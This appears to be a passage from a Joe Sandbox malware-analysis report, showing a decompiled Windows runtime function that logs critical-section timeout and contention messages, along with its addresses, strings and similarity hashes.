                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                    • Instruction ID: e4e484a600425e4e2f3d2455c9f5d9c91bd5f31955e5dd26f54a8110e14ce109
                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                    • Instruction Fuzzy Hash:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B1FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 53%
                                                    			E00B1FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00ACCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00B15720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00B15720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                    0x00b1fdda
                                                    0x00b1fde2
                                                    0x00b1fde5
                                                    0x00b1fdec
                                                    0x00b1fdfa
                                                    0x00b1fdff
                                                    0x00b1fe0a
                                                    0x00b1fe0f
                                                    0x00b1fe17
                                                    0x00b1fe1e
                                                    0x00b1fe19
                                                    0x00b1fe19
                                                    0x00b1fe19
                                                    0x00b1fe20
                                                    0x00b1fe21
                                                    0x00b1fe22
                                                    0x00b1fe25
                                                    0x00b1fe40

                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B1FDFA
                                                    Strings
                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B1FE01
                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B1FE2B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                    • API String ID: 885266447-3903918235
                                                    • Opcode ID: 30565464811e1a2718cc21879d1916cb5170740f7680667cf85756dc77de0f14
                                                    • Instruction ID: 02b735c0d8a8883233d592c009200a11a58ccdbbdfb50d70102db669ed818a43
                                                    • Opcode Fuzzy Hash: 30565464811e1a2718cc21879d1916cb5170740f7680667cf85756dc77de0f14
                                                    • Instruction Fuzzy Hash: D3F0C232200601BBE6211A45DC02F63BB9AEB84730F244254F628561E1DA62ACA097A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%